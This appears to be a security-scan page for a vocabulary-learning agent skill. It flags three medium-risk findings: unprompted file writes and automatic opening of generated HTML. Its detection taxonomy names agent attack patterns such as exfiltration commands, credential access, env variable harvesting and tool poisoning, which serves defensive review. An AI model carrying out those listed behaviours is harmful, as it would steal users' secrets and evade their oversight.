ClawHub

english-vocabulary-helper

Security checks across malware telemetry and agentic risk

Overview

This vocabulary-helper skill is instruction-only and coherently saves local study files, though users should know it auto-opens generated HTML cards.

Install this if you are comfortable with the agent creating Markdown and HTML vocabulary cards under ~/.qclaw/workspace/vocabulary/words/ and opening the generated HTML in your browser. Review generated HTML before opening if you use it with untrusted or unusual prompt content.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (3)

Description-Behavior Mismatch

Medium
Confidence
94% confidence
Finding
The skill claims to be a vocabulary-learning helper, but it requires persistent file creation and automatic opening of generated HTML files on every use. That behavior exceeds what is necessary for simple tutoring and creates unnecessary system-side effects, including disk writes and launching local content, which could be abused if future content generation is manipulated.

Context-Inappropriate Capability

Medium
Confidence
96% confidence
Finding
Mandating that the agent automatically open generated HTML files introduces a local execution/launch action unrelated to the core educational purpose. Even if the HTML is locally generated, auto-launching browser-rendered content increases risk from active scripts, deceptive UI, or unsafe future modifications without requiring user approval.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The skill directs the agent to create files and open HTML automatically without a clear consent step, despite these being system-impacting actions beyond ordinary tutoring. This violates the principle of least astonishment and could lead to unwanted writes or file launches on behalf of the user.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal